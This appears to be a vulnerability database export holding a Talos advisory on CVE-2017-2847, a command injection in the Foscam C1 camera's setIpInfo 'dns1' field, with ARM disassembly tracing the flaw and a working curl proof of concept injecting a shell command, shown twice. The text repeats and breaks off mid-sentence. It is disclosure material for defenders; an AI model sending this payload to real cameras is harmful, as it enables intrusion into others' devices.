another service dispatches a message of the specified code [3]. An example of this registration process is handled inside the `FCGI_Init` function of the \"CGIProxy.fcgi\" service using the following code:\r\n```\r\n.text:00009F20 FCGX_Init_1f20\r\n.text:00009F20\r\n.text:00009F20 F0 41 2D E9 STMFD SP!, {R4-R8,LR}\r\n.text:00009F24 41 DE 4D E2 SUB SP, SP, #0x410\r\n.text:00009F28 08 D0 4D E2 SUB SP, SP, #8\r\n.text:00009F2C 05 FC FF EB BL FCGX_Init\r\n.text:00009F2C\r\n.text:00009F30 00 10 50 E2 SUBS R1, R0, #0\r\n.text:00009F34 44 01 9F 15 LDRNE R0, =str.FCGX_Initfailed\r\n.text:00009F38 05 00 00 1A BNE leave_exit_1f54\r\n.text:00009F3C\r\n.text:00009F3C 40 01 9F E5 LDR R0, =gv_theRequest_10b74\r\n.text:00009F40 01 20 A0 E1 MOV R2, R1\r\n.text:00009F44 1A FC FF EB BL FCGX_InitRequest\r\n.text:00009F48\r\n.text:00009F48 00 00 50 E3 CMP R0, #0\r\n.text:00009F4C 03 00 00 0A BEQ loc_9F60\r\n...\r\n.text:00009F60 loc_9F60\r\n.text:00009F60 DB FE FF EB BL registerMsgClients_1ad4\r\n\r\n.text:00009AD4 registerMsgClients_1ad4\r\n.text:00009AD4 10 40 2D E9 STMFD SP!, {R4,LR}\r\n.text:00009AD4\r\n.text:00009AD8 30 40 9F E5 LDR R4, =gp_cMsgClient_bac8\r\n.text:00009ADC 30 10 9F E5 LDR R1, =0x40004001 ; [3] code\r\n.text:00009AE0 04 00 A0 E1 MOV R0, R4\r\n.text:00009AE4 2C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38 ; [2] callback function\r\n.text:00009AE8 3D FD FF EB BL CMsgClient::registerMsgHandle(int,void (*)(char const*,int)) ; [1]\r\n.text:00009AE8\r\n.text:00009AEC 04 00 A0 E1 MOV R0, R4\r\n.text:00009AF0 24 10 9F E5 LDR R1, =0x3001\r\n.text:00009AF4 1C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38\r\n.text:00009AF8 39 FD FF EB BL CMsgClient::registerMsgHandle(int,void (*)(char const*,int))\r\n.text:00009AF8\r\n.text:00009AFC 04 00 A0 E1 MOV R0, R4\r\n.text:00009B00 18 10 9F E5 LDR R1, =0x3002\r\n.text:00009B04 0C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38\r\n.text:00009B08 10 40 BD E8 LDMFD SP!, {R4,LR}\r\n.text:00009B0C 34 FD FF EA B CMsgClient::registerMsgHandle(int,void (*)(char const*,int))\r\n```\r\n\r\nAfter the \"CGIProxy.fcgi\" service decodes an HTTP request that's forwarded from the HTTP daemon, the service will copy the decoded query into a buffer on the stack [4]. Once this is done, the buffer will then be used to pass the decoded query to `CMsgClient::sendMsg`. This will dispatch the query to the shared messaging subsystem using the code 0x4001 at [5]. At this point, the service that handles the specified code will be woken up to handle the specified request.\r\n```\r\n.text:00009FA8 14 70 8D E2 ADD R7, SP, #0x430+lv_dest_41c\r\n.text:00009FAC 08 10 A0 E1 MOV R1, R8\r\n.text:00009FB0 07 00 A0 E1 MOV R0, R7\r\n.text:00009FB4 34 FC FF EB BL strcpy ; [4]\r\n.text:00009FB8\r\n.text:00009FB8 08 00 A0 E1 MOV R0, R8\r\n.text:00009FBC C0 FB FF EB BL strlen\r\n.text:00009FC0\r\n.text:00009FC0 CC 30 9F E5 LDR R3, =0x404\r\n.text:00009FC4 00 30 8D E5 STR R3, [SP]\r\n.text:00009FC8 C8 10 9F E5 LDR R1, =0x4001 ; [5]\r\n.text:00009FCC 07 30 A0 E1 MOV R3, R7 ; uri request\r\n.text:00009FD0 01 20 A0 E3 MOV R2, #1\r\n.text:00009FD4 04 40 8D E5 STR R4, [SP,#4]\r\n.text:00009FD8 08 40 8D E5 STR R4, [SP,#8]\r\n.text:00009FDC 0C 40 8D E5 STR R4, [SP,#12]\r\n.text:00009FE0 14 04 8D E5 STR R0, [SP,#0x430+var_1C]\r\n.text:00009FE4 B0 00 9F E5 LDR R0, =gp_cMsgClient_bac8\r\n.text:00009FE8 CD FB FF EB BL CMsgClient::sendMsg(int,char,char const*,int,int,int,char *)\r\n```\r\n\r\nThe handler for code 0x4001 is in the \"webService\" binary and is done by the function `executeCGICmd` at address 0x1e5a4. At the beginning of this function, the service will call a function [6] that's responsible for extracting the user name, password, and command that was specified within the user's query. Once the parameters have been extracted and copied into a local buffer on the stack, the command will be passed to the function call at [7] in order to determine the correct command function which is stored to funcptr. If authentication is not required for the command, then the branch at [8] will execute the function pointer returned by `findJsonCallbackCommand` at [7]. If authentication is required from the command, then the user name and password will be checked via `strcmp` and then the function call at [9] will execute the function pointer.\r\n```\r\n.text:0001E5A4 executeCGICmd\r\n.text:0001E5A4\r\n.text:0001E5A4 F0 41 2D E9 STMFD SP!, {R4-R8,LR}\r\n.text:0001E5A8 28 60 80 E2 ADD R6, R0, #0x28\r\n.text:0001E5AC 11 DD 4D E2 SUB SP, SP, #0x440\r\n.text:0001E5B0 00 80 A0 E1 MOV R8, R0\r\n.text:0001E5B4 06 10 A0 E1 MOV R1, R6\r\n.text:0001E5B8 C4 00 9F E5 LDR R0, =unk_D5A68\r\n.text:0001E5BC 3A 2A 00 EB BL sub_28EAC ; [6]\r\n\r\n.text:00028EAC sub_28EAC\r\n.text:00028EAC\r\n.text:00028EAC F0 47 2D E9 STMFD SP!, {R4-R10,LR}\r\n.text:00028EB0 00 40 51 E2 SUBS R4, R1, #0\r\n.text:00028EB4 00 80 A0 E1 MOV R8, R0\r\n.text:00028EB8 46 DF 4D E2 SUB SP, SP, #0x118\r\n.text:00028EBC 00 00 E0 03 MOVEQ R0, #0xFFFFFFFF\r\n.text:00028EC0 8B 00 00 0A BEQ leaving_290F4\r\n...\r\n.text:00028F4C 00 00 50 E3 CMP R0, #0\r\n.text:00028F50 0C 00 00 1A BNE findCmdCallback_28F88\r\n...\r\n.text:00028F88 findCmdCallback_28F88\r\n.text:00028F88 05 00 A0 E1 MOV R0, R5\r\n.text:00028F8C 45 1F 8D E2 ADD R1, SP, #0x138+lp_funcptr?_24\r\n.text:00028F90 89 FC FF EB BL findJsonCallbackCommand_281BC ; [7]\r\n.text:00028F94 00 90 50 E2 SUBS R9, R0, #0\r\n.text:00028F98 06 00 00 0A BEQ checkIfAuthNeeded_28FB8\r\n...\r\n.text:00028FB8 checkIfAuthNeeded_28FB8\r\n.text:00028FB8 14 31 9D E5 LDR R3, [SP,#0x138+lp_funcptr?_24]\r\n.text:00028FBC 54 21 9F E5 LDR R2, =0xFFFF\r\n.text:00028FC0 08 10 93 E5 LDR R1, [R3,#8]\r\n.text:00028FC4 02 00 51 E1 CMP R1, R2\r\n.text:00028FC8 06 00 00 1A BNE authenticate_28FE8\r\n...\r\n.text:00028FD8 04 00 A0 E1 MOV R0, R4\r\n.text:00028FDC 33 FF 2F E1 BLX R3 ; [8]\r\n.text:00028FE0 09 00 A0 E1 MOV R0, R9\r\n.text:00028FE4 42 00 00 EA B leaving_290F4\r\n...\r\n.text:000290E0 04 00 A0 E1 MOV R0, R4\r\n.text:000290E4 33 FF 2F E1 BLX R3 ; [9]\r\n.text:000290E8 05 00 A0 E1 MOV R0, R5\r\n.text:000290EC 00 00 00 EA B leaving_290F4\r\n...\r\n.text:000290F4 46 DF 8D E2 ADD SP, SP, #0x118\r\n.text:000290F8 F0 87 BD E8 LDMFD SP!, {R4-R10,PC}\r\n```\r\n\r\nWhen handling the \"CGIProxy.fcgi\" command \"setIpInfo\", the function `setIpInfo_37f30` will be called. This function is responsible for setting up the interface either via dhcp or by manually setting an IP address, netmask, gateway and dns. At the beginning of the function, the parameters [10] for \"callbackJson\", \"isDHCP\", \"ip\", \"gate\", \"mask\", \"dns1\", \"dns2\" are extracted from the query. Afterwards, the \"isDHCP\" value [11] is checked against 0 and if it is, the the \"ip\" and \"mask\" parameter values are passed to the function `sub_3FE28` [12] to be parsed using `inet_addr`: 0 is returned if parameters are correctly parsed, -1 otherwise. The return value is passed via IPC via code 0x3001 [13], which is handled by the binary \"CGIProxy.fcgi\" and takes care of returning the error code as result of the operation. Regardless the \"ip\" and \"mask\" parameters were parsed correctly or not, the execution will continue and another message is sent with code 0x601d via IPC [14].\r\n```\r\n.text:0003FF30 setIpInfo_37f30\r\n.text:0003FF30\r\n.text:0003FF30 F0 40 2D E9 STMFD SP!, {R4-R7,LR}\r\n...\r\n.text:0003FF54 38 11 9F E5 LDR R1, =str.callbackJson\r\n.text:0003FF58 BA A0 FF EB BL extract_param ; [10]\r\n...\r\n.text:0003FF60 30 11 9F E5 LDR R1, =str.isDHCP\r\n...\r\n.text:0003FF68 B6 A0 FF EB BL extract_param ; [10]\r\n...\r\n.text:0003FF7C 18 11 9F E5 LDR R1, =str.ip\r\n...\r\n.text:0003FF98 AA A0 FF EB BL extract_param ; [10]\r\n...\r\n.text:0003FFA0 F8 10 9F E5 LDR R1, =str.gate\r\n...\r\n.text:0003FFAC A5 A0 FF EB BL extract_param ; [10]\r\n.text:0003FFB0 EC 10 9F E5 LDR R1, =str.mask\r\n...\r\n.text:0003FFBC A1 A0 FF EB BL extract_param ; [10]\r\n.text:0003FFC0 E0 10 9F E5 LDR R1, =str.dns1\r\n...\r\n.text:0003FFCC 9D A0 FF EB BL extract_param ; [10]\r\n...\r\n.text:0003FFD4 D0 10 9F E5 LDR R1, =str.dns2\r\n...\r\n.text:0003FFDC 99 A0 FF EB BL extract_param ; [10]\r\n.text:0003FFE0 1C 34 DD E5 LDRB R3, [SP,#0x4E0+var_C4] ; [11]\r\n.text:0003FFE4 00 00 53 E3 CMP R3, #0\r\n.text:0003FFE8 05 00 00 1A BNE loc_40004\r\n.text:0003FFEC 07 00 A0 E1 MOV R0, R7 ; \"ip\" value\r\n.text:0003FFF0 06 10 A0 E1 MOV R1, R6 ; \"mask\" value\r\n.text:0003FFF4 8B FF FF EB BL sub_3FE28 ; [12]\r\n.text:0003FFF8 00 00 50 E3 CMP R0, #0\r\n.text:0003FFFC 00 20 E0 13 MOVNE R2, #0xFFFFFFFF\r\n.text:00040000 00 00 00 1A BNE loc_40008\r\n.text:00040004\r\n.text:00040004 loc_40004\r\n.text:00040004 00 20 A0 E3 MOV R2, #0\r\n.text:00040008\r\n.text:00040008 loc_40008\r\n...\r\n.text:00040034 7C 10 9F E5 LDR R1, =0x3001 ; [13]\r\n...\r\n.text:00040050 81 4A FF EB BL CMsgClient::sendMsg()\r\n...\r\n.text:00040068 54 10 9F E5 LDR R1, =0x601D ; [14]\r\n...\r\n.text:00040084 74 4A FF EB BL CMsgClient::sendMsg()\r\n...\r\n.text:00040090 F0 80 BD E8 LDMFD SP!, {R4-R7,PC}\r\n```\r\n\r\nCode 0x601d is handled in the \"devMng\" binary by the function `OnDevMngMsgSetIpInfo_120ac`. The function extracts \"isDHCP\", ip\", \"mask\", \"gate\", \"dns1\" and \"dns2\" parameters from the IPC call and passes them to the function `sub_3D880` [15]. This function checks a global variable for the state of the operation. In this first call, the branch is not taken and the function will only call `sub_37ED8` [17], which saves all the parameters in \"/mnt/mtd/app/config/NetworkConfig.bin\". Parameters are also saved in a global structure, to allow access from concurring threads. If no errors are returned, `OnDevMngMsgSetIpInfo_120ac` will call `sub_3AAE4` [19] by passing the pointer to a global structure [18]. The purpose of this function is to flag the completion of the interfaces configuration by putting \"1\" into the structure, at 0x8822c [20].\r\n```\r\n.text:0001A0AC OnDevMngMsgSetIpInfo_120ac\r\n.text:0001A0AC\r\n.text:0001A0AC 70 40 2D E9 STMFD SP!, {R4-R6,LR}\r\n...\r\n.text:0001A140 CE 8D 00 EB BL sub_3D880 ; [15]\r\n\r\n\r\n.text:0003D880 sub_3D880\r\n.text:0003D880\r\n.text:0003D880 F0 45 2D E9 STMFD SP!, {R4-R8,R10,LR}\r\n...\r\n.text:0003D898 00 20 D2 E5 LDRB R2, [R2] ; [16]\r\n.text:0003D89C 1A 00 00 0A BEQ loc_3D90C\r\n.text:0003D8A0 00 00 52 E3 CMP R2, #0\r\n...\r\n.text:0003D8BC 05 10 A0 E1 MOV R1, R5\r\n.text:0003D8C0 04 30 D1 E4 LDRB R3, [R1],#4\r\n.text:0003D8C4 10 30 C4 E5 STRB R3, [R4,#0x10]\r\n.text:0003D8C8 14 00 84 E2 ADD R0, R4, #0x14\r\n.text:0003D8CC 9E 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D8D0 08 10 85 E2 ADD R1, R5, #8\r\n.text:0003D8D4 18 00 84 E2 ADD R0, R4, #0x18\r\n.text:0003D8D8 9B 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D8DC 0C 10 85 E2 ADD R1, R5, #0xC\r\n.text:0003D8E0 1C 00 84 E2 ADD R0, R4, #0x1C\r\n.text:0003D8E4 98 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D8E8 10 10 85 E2 ADD R1, R5, #0x10\r\n.text:0003D8EC 20 00 84 E2 ADD R0, R4, #0x20\r\n.text:0003D8F0 95 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D8F4 24 00 84 E2 ADD R0, R4, #0x24\r\n.text:0003D8F8 14 10 85 E2 ADD R1, R5, #0x14\r\n.text:0003D8FC 92 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D900 10 00 84 E2 ADD R0, R4, #0x10\r\n.text:0003D904 73 E9 FF EB BL sub_37ED8 ; [17]\r\n...\r\n.text:0003E078 F0 85 BD E8 LDMFD SP!, {R4-R8,R10,PC}\r\n\r\n... OnDevMngMsgSetIpInfo_120ac\r\n...\r\n.text:0001A144 01 00 70 E3 CMN R0, #1\r\n.text:0001A148 04 00 00 0A BEQ loc_1A160\r\n.text:0001A14C 54 00 9F E5 LDR R0, =dword_85D88 ; [18]\r\n...\r\n.text:0001A15C 60 82 00 EB BL sub_3AAE4 ; [19]\r\n\r\n.text:0003AAE4 sub_3AAE4\r\n...\r\n.text:0003AB08 00 40 A0 E1 MOV R4, R0\r\n...\r\n.text:0003ABCC 34 30 9F E5 LDR R3, =0x24A4\r\n.text:0003ABD0 01 20 A0 E3 MOV R2, #1\r\n.text:0003ABD4 03 20 C4 E7 STRB R2, [R4,R3] ; [20]\r\n```\r\n\r\nThe application creates 13 threads in total at startup. One of them is continuously polling for network changes: `sub_42DE0`. Two functions are called in a loop: one for softAP configuration [21] and one for wifi and ethernet connections [22]. We will explore the latter.\r\n```\r\n.text:00042DE0 sub_42DE0\r\n.text:00042DE0\r\n.text:00042DE0 38 40 2D E9 STMFD SP!, {R3-R5,LR}\r\n.text:00042DE4 00 40 A0 E1 MOV R4, R0\r\n.text:00042DE8 06 50 A0 E3 MOV R5, #6\r\n.text:00042DEC\r\n.text:00042DEC loc_42DEC\r\n.text:00042DEC 05 10 A0 E1 MOV R1, R5\r\n.text:00042DF0 04 00 A0 E1 MOV R0, R4\r\n.text:00042DF4 68 E6 FF EB BL sub_3C79C ; [21]\r\n.text:00042DF8 00 10 A0 E1 MOV R1, R0\r\n.text:00042DFC 04 00 A0 E1 MOV R0, R4\r\n.text:00042E00 BE FE FF EB BL sub_42900 ; [22]\r\n.text:00042E04 00 50 A0 E1 MOV R5, R0\r\n.text:00042E08 04 00 9F E5 LDR R0, =0xF4240\r\n.text:00042E0C 51 3D FF EB BL usleep\r\n.text:00042E10 F5 FF FF EA B loc_42DEC ; loop\r\n```\r\n\r\n`sub_42900` is the function that actually checks for the value of the global variable at 0x8822c [23]. As soon as its value is not 0, the function `sub_428E0` is called.\r\n```\r\n.text:00042D4C 88 30 9F E5 LDR R3, =0x24A4\r\n.text:00042D50 03 20 D4 E7 LDRB R2, [R4,R3] ; [23]\r\n.text:00042D54 00 00 52 E3 CMP R2, #0\r\n.text:00042D58 04 00 00 0A BEQ loc_42D70\r\n.text:00042D5C 00 20 A0 E3 MOV R2, #0\r\n.text:00042D60 03 20 C4 E7 STRB R2, [R4,R3]\r\n.text:00042D64 04 00 A0 E1 MOV R0, R4\r\n.text:00042D68 05 10 A0 E1 MOV R1, R5\r\n.text:00042D6C DB FE FF EB BL sub_428E0\r\n```\r\n\r\nAt this point the execution will continue with many different calls, from a higher level perspective the following is the path that will be taken, stripped to only interesting the stubs (capital names are user-controlled strings):\r\n```\r\nsub_428E0\r\n sub_3FB2C\r\n sub_3B94C\r\n system(\"ifconfig eth0 0.0.0.0\")\r\n system(\"ifconfig ra0 up\")\r\n sub_3B8F0\r\n sub_3A95C\r\n system(\"rm -rf /var/run/wpa_supplicant\")\r\n system(\"ifconfig ra0 down\")\r\n system(\"killall wpa_supplicant\")\r\n sub_3B804\r\n system(\"ifconfig ra0 up\")\r\n sub_4286C\r\n sub_3E164\r\n system(\"ifconfig ra0 0.0.0.0\")\r\n system(\"ifconfig ra0 down\")\r\n sub_3D880\r\n system(\"killall udhcpc\")\r\n fork()\r\n child: execlp(\"ifconfig\", \"ifconfig\", \"eth0\", IP, \"netmask\", NETMASK)\r\n fork()\r\n child: execlp(\"sh\", \"sh\", \"-c\", \"route del default dev eth0\")\r\n fork()\r\n child: execlp(\"sh\", \"sh\", \"-c\", \"route add default gw GATEWAY dev eth0\")\r\n fork()\r\n child: execlp(\"sh\", \"sh\", \"-c\", \"echo nameserver DNS1 > /etc/resolv.conf\")\r\n fork()\r\n child: execlp(\"sh\", \"sh\", \"-c\", \"echo nameserver DNS2 >> /etc/resolv.conf\")\r\n system(\"killall -9 OnvifAgent\")\r\n```\r\n\r\nFunction `sub_3E164` fetches the parameters from a global structure and passes them to `sub_3D880`. Function `sub_3D880` was already called before, but this time the global state is different. The function thus takes a different branch and the actual interface configuration takes place. User-supplied parameters are taken unmodified from a global structure. In this function the dns1 parameter [24] is never sanitized and used in a `sprintf` [25] call to build the final command that will be passed to `execlp` [26].\r\n```\r\n.text:0003DF90 B4 11 9F E5 LDR R1, =str.echonameservers1 ; \"echo nameserver %s > /etc/resolv.conf\"\r\n.text:0003DF94 10 20 95 E5 LDR R2, [R5,#0x10] ; [24]\r\n.text:0003DF98 04 00 A0 E1 MOV R0, R4\r\n.text:0003DF9C 66 53 FF EB BL sprintf ; [25]\r\n.text:0003DFA0 A4 53 FF EB BL fork\r\n.text:0003DFA4 00 30 50 E2 SUBS R3, R0, #0\r\n.text:0003DFA8 0C 00 00 1A BNE loc_3DFE0\r\n.text:0003DFAC 88 01 9F E5 LDR R0, =str.sh ; \"sh\"\r\n.text:0003DFB0 00 30 8D E5 STR R3, [SP,#0xD8+var_D8]\r\n.text:0003DFB4 00 10 A0 E1 MOV R1, R0\r\n.text:0003DFB8 80 21 9F E5 LDR R2, =str._c ; \"-c\"\r\n.text:0003DFBC 04 30 A0 E1 MOV R3, R4 ; [26]\r\n.text:0003DFC0 CC 53 FF EB BL execlp\r\n```\r\n\r\n### Exploit Proof-of-Concept\r\nThis vulnerability is reachable by the \"setIpInfo\" command and requires a valid user account with administrator privileges. The following proof of concept shows how to execute an arbitrary command.\r\n```\r\n$ sUsr=\"admin\"\r\n$ sPwd=\"\"\r\n$ sIP=192.168.0.20\r\n$ sMask=255.255.255.0\r\n$ sGW=192.168.0.1\r\n$ sDns1=1.1.1.1\r\n$ sDns2=2.2.2.2\r\n$ sCmd=`perl -MURI::Escape -e 'print uri_escape(\";id>/tmp/www/inj;\")'`\r\n$ curl \"http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=guest&pwd=asd0--&cmd=setIpInfo&isDHCP=0&ip=${sIP}&mask=${sMask}&gate=${sGW}&dns1=${sDns1}${sCmd}&dns2=${sDns2}\"\r\n```\r\n\r\n### Timeline\r\n* 2017-05-30 - Vendor Disclosure\r\n* 2017-06-19 - Public Release\r\n\r\n### CREDIT\r\n* Discovered by Claudio Bozzato of Cisco Talos.", "reporter": "Root", "published": "2017-09-15T00:00:00", "type": "seebug", "title": "Foscam IP Video Camera CGIProxy.fcgi DNS1 Address Configuration Command Injection Vulnerability(CVE-2017-2847)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2847"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2017-09-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96495", "id": "SSV:96495", "sourceData": "\n $ sUsr=\"admin\"\r\n$ sPwd=\"\"\r\n$ sIP=192.168.0.20\r\n$ sMask=255.255.255.0\r\n$ sGW=192.168.0.1\r\n$ sDns1=1.1.1.1\r\n$ sDns2=2.2.2.2\r\n$ sCmd=`perl -MURI::Escape -e 'print uri_escape(\";id>/tmp/www/inj;\")'`\r\n$ curl \"http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=guest&pwd=asd0--&cmd=setIpInfo&isDHCP=0&ip=${sIP}&mask=${sMask}&gate=${sGW}&dns1=${sDns1}${sCmd}&dns2=${sDns2}\"\n ", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96495", "status": "cve,poc,details"}], "talos": [{"lastseen": "2018-08-31T00:36:32", "references": [], "description": "# Talos Vulnerability Report\n\n### TALOS-2017-0349\n\n## Foscam IP Video Camera CGIProxy.fcgi DNS1 Address Configuration Command Injection Vulnerability\n\n##### June 19, 2017\n\n##### CVE Number\n\nCVE-2017-2847\n\n### Summary\n\nAn exploitable command injection vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. A specially crafted HTTP request can allow for a user to inject arbitrary shell characters during manual network configuration resulting in command injection. An attacker can simply send an HTTP request to the device to trigger this vulnerability.\n\n### Tested Versions\n\nFoscam, Inc. Indoor IP Camera C1 Series\n \n \n System Firmware Version: 1.9.3.17\n Application Firmware Version: 2.52.2.37\n Web Version: 2.0.1.1\n Plug-In Version: 3.3.0.5\n \n\n### Product URLs\n\n[Foscam](<http://www.foscam.com/>)\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\n\n### Details\n\nFoscam produces a series of IP-capable surveillance devices, network video recorders, and baby monitors for the end-user. Foscam produces a range of cameras for both indoor and outdoor use and with wireless capability. One of these models is the C1 series which contains a web-based user interface for management and is based on the ARM architecture. Foscam is considered one of the most common security cameras out on the current market.\n\nWhen various services are started, a service will first register a callback using the `CMsgClient::registerMsgHandle` function [1]. This will register a function to be called [2] when another service dispatches a message of the specified code [3]. An example of this registration process is handled inside the `FCGI_Init` function of the \"CGIProxy.fcgi\" service using the following code:\n \n \n .text:00009F20 FCGX_Init_1f20\n .text:00009F20\n .text:00009F20 F0 41 2D E9 STMFD SP!, {R4-R8,LR}\n .text:00009F24 41 DE 4D E2 SUB SP, SP, #0x410\n .text:00009F28 08 D0 4D E2 SUB SP, SP, #8\n .text:00009F2C 05 FC FF EB BL FCGX_Init\n .text:00009F2C\n .text:00009F30 00 10 50 E2 SUBS R1, R0, #0\n .text:00009F34 44 01 9F 15 LDRNE R0, =str.FCGX_Initfailed\n .text:00009F38 05 00 00 1A BNE leave_exit_1f54\n .text:00009F3C\n .text:00009F3C 40 01 9F E5 LDR R0, =gv_theRequest_10b74\n .text:00009F40 01 20 A0 E1 MOV R2, R1\n .text:00009F44 1A FC FF EB BL FCGX_InitRequest\n .text:00009F48\n .text:00009F48 00 00 50 E3 CMP R0, #0\n .text:00009F4C 03 00 00 0A BEQ loc_9F60\n ...\n .text:00009F60 loc_9F60\n .text:00009F60 DB FE FF EB BL registerMsgClients_1ad4\n \n .text:00009AD4 registerMsgClients_1ad4\n .text:00009AD4 10 40 2D E9 STMFD SP!, {R4,LR}\n .text:00009AD4\n .text:00009AD8 30 40 9F E5 LDR R4, =gp_cMsgClient_bac8\n .text:00009ADC 30 10 9F E5 LDR R1, =0x40004001 ; [3] code\n .text:00009AE0 04 00 A0 E1 MOV R0, R4\n .text:00009AE4 2C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38 ; [2] callback function\n .text:00009AE8 3D FD FF EB BL CMsgClient::registerMsgHandle(int,void (*)(char const*,int)) ; [1]\n .text:00009AE8\n .text:00009AEC 04 00 A0 E1 MOV R0, R4\n .text:00009AF0 24 10 9F E5 LDR R1, =0x3001\n .text:00009AF4 1C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38\n .text:00009AF8 39 FD FF EB BL CMsgClient::registerMsgHandle(int,void (*)(char const*,int))\n .text:00009AF8\n .text:00009AFC 04 00 A0 E1 MOV R0, R4\n .text:00009B00 18 10 9F E5 LDR R1, =0x3002\n .text:00009B04 0C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38\n .text:00009B08 10 40 BD E8 LDMFD SP!, {R4,LR}\n .text:00009B0C 34 FD FF EA B CMsgClient::registerMsgHandle(int,void (*)(char const*,int))\n \n\nAfter the \"CGIProxy.fcgi\" service decodes an HTTP request that's forwarded from the HTTP daemon, the service will copy the decoded query into a buffer on the stack [4]. Once this is done, the buffer will then be used to pass the decoded query to `CMsgClient::sendMsg`. This will dispatch the query to the shared messaging subsystem using the code 0x4001 at [5]. At this point, the service that handles the specified code will be woken up to handle the specified request.\n \n \n .text:00009FA8 14 70 8D E2 ADD R7, SP, #0x430+lv_dest_41c\n .text:00009FAC 08 10 A0 E1 MOV R1, R8\n .text:00009FB0 07 00 A0 E1 MOV R0, R7\n .text:00009FB4 34 FC FF EB BL strcpy ; [4]\n .text:00009FB8\n .text:00009FB8 08 00 A0 E1 MOV R0, R8\n .text:00009FBC C0 FB FF EB BL strlen\n .text:00009FC0\n .text:00009FC0 CC 30 9F E5 LDR R3, =0x404\n .text:00009FC4 00 30 8D E5 STR R3, [SP]\n .text:00009FC8 C8 10 9F E5 LDR R1, =0x4001 ; [5]\n .text:00009FCC 07 30 A0 E1 MOV R3, R7 ; uri request\n .text:00009FD0 01 20 A0 E3 MOV R2, #1\n .text:00009FD4 04 40 8D E5 STR R4, [SP,#4]\n .text:00009FD8 08 40 8D E5 STR R4, [SP,#8]\n .text:00009FDC 0C 40 8D E5 STR R4, [SP,#12]\n .text:00009FE0 14 04 8D E5 STR R0, [SP,#0x430+var_1C]\n .text:00009FE4 B0 00 9F E5 LDR R0, =gp_cMsgClient_bac8\n .text:00009FE8 CD FB FF EB BL CMsgClient::sendMsg(int,char,char const*,int,int,int,char *)\n \n\nThe handler for code 0x4001 is in the \"webService\" binary and is done by the function `executeCGICmd` at address 0x1e5a4. At the beginning of this function, the service will call a function [6] that's responsible for extracting the user name, password, and command that was specified within the user's query. Once the parameters have been extracted and copied into a local buffer on the stack, the command will be passed to the function call at [7] in order to determine the correct command function which is stored to `funcptr`. If authentication is not required for the command, then the branch at [8] will execute the function pointer returned by `findJsonCallbackCommand` at [7]. If authentication is required from the command, then the user name and password will be checked via `strcmp` and then the function call at [9] will execute the function pointer.\n \n \n .text:0001E5A4 executeCGICmd\n .text:0001E5A4\n .text:0001E5A4 F0 41 2D E9 STMFD SP!, {R4-R8,LR}\n .text:0001E5A8 28 60 80 E2 ADD R6, R0, #0x28\n .text:0001E5AC 11 DD 4D E2 SUB SP, SP, #0x440\n .text:0001E5B0 00 80 A0 E1 MOV R8, R0\n .text:0001E5B4 06 10 A0 E1 MOV R1, R6\n .text:0001E5B8 C4 00 9F E5 LDR R0, =unk_D5A68\n .text:0001E5BC 3A 2A 00 EB BL sub_28EAC ; [6]\n \n .text:00028EAC sub_28EAC\n .text:00028EAC\n .text:00028EAC F0 47 2D E9 STMFD SP!, {R4-R10,LR}\n .text:00028EB0 00 40 51 E2 SUBS R4, R1, #0\n .text:00028EB4 00 80 A0 E1 MOV R8, R0\n .text:00028EB8 46 DF 4D E2 SUB SP, SP, #0x118\n .text:00028EBC 00 00 E0 03 MOVEQ R0, #0xFFFFFFFF\n .text:00028EC0 8B 00 00 0A BEQ leaving_290F4\n ...\n .text:00028F4C 00 00 50 E3 CMP R0, #0\n .text:00028F50 0C 00 00 1A BNE findCmdCallback_28F88\n ...\n .text:00028F88 findCmdCallback_28F88\n .text:00028F88 05 00 A0 E1 MOV R0, R5\n .text:00028F8C 45 1F 8D E2 ADD R1, SP, #0x138+lp_funcptr?_24\n .text:00028F90 89 FC FF EB BL findJsonCallbackCommand_281BC ; [7]\n .text:00028F94 00 90 50 E2 SUBS R9, R0, #0\n .text:00028F98 06 00 00 0A BEQ checkIfAuthNeeded_28FB8\n ...\n .text:00028FB8 checkIfAuthNeeded_28FB8\n .text:00028FB8 14 31 9D E5 LDR R3, [SP,#0x138+lp_funcptr?_24]\n .text:00028FBC 54 21 9F E5 LDR R2, =0xFFFF\n .text:00028FC0 08 10 93 E5 LDR R1, [R3,#8]\n .text:00028FC4 02 00 51 E1 CMP R1, R2\n .text:00028FC8 06 00 00 1A BNE authenticate_28FE8\n ...\n .text:00028FD8 04 00 A0 E1 MOV R0, R4\n .text:00028FDC 33 FF 2F E1 BLX R3 ; [8]\n .text:00028FE0 09 00 A0 E1 MOV R0, R9\n .text:00028FE4 42 00 00 EA B leaving_290F4\n ...\n .text:000290E0 04 00 A0 E1 MOV R0, R4\n .text:000290E4 33 FF 2F E1 BLX R3 ; [9]\n .text:000290E8 05 00 A0 E1 MOV R0, R5\n .text:000290EC 00 00 00 EA B leaving_290F4\n ...\n .text:000290F4 46 DF 8D E2 ADD SP, SP, #0x118\n .text:000290F8 F0 87 BD E8 LDMFD SP!, {R4-R10,PC}\n \n\nWhen handling the \"CGIProxy.fcgi\" command \"setIpInfo\", the function `setIpInfo_37f30` will be called. This function is responsible for setting up the interface either via dhcp or by manually setting an IP address, netmask, gateway and dns. At the beginning of 